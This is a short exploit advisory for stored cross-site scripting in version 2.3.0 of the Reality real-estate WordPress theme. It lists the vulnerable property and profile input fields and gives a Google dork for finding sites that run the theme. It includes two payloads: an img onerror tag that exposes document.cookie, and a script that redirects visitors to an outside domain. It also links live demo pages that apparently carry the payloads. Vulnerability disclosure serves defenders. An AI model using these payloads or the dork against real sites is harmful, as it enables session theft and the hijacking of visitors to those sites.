# Exploit Title: Reality | Estate Multipurpose WordPress Theme Persistent XSS
# Google Dork: "/wp-content/themes/reality/framework/"
# Date: 08/09/2019
# Exploit Author: SubversA
# Vendor Homepage: http://inwavethemes.com/
# Software Link: https://themeforest.net/item/reality-real-estate-wordpress-theme/21627776
# Version: 2.3.0
# Tested on: Parrot OS
# CVE : -
# CWE : 79
----[]- Persistent XSS on any property page: -[]----
You need a new user account, then edit any existed property or create a new one, f.e.: http://reality.inwavethemes.com/dashboard/?tab=edit-property&property-id=4457
Vulnerable input fields:
1 - Description & Price -> «PRICE POSTFIX TEXT» and «SECOND PRICE POSTFIX TEXT»;
2 - Additional Information -> «TITLE» and «VALUE»;
3 - Location & Map -> «ADDRESS *».
Payload Sample: <img src=x onerror=(alert)(document.cookie)>
Live example: http://reality.inwavethemes.com/?post_type=iwp_property&p=4457
----[]- Persistent XSS on user profile page: -[]----
Vulnerable input fields:
Profile Information -> «OFFICE NUMBER», «MOBILE NUMBER» and «FAX NUMBER».
Payload Sample: "><script>alert('YOUR FLESH IS AN INSULT TO THE PERFECTION OF THE DIGITAL');location='http://defcon.su';</script>
Live example: http://reality.inwavethemes.com/author/asdasd/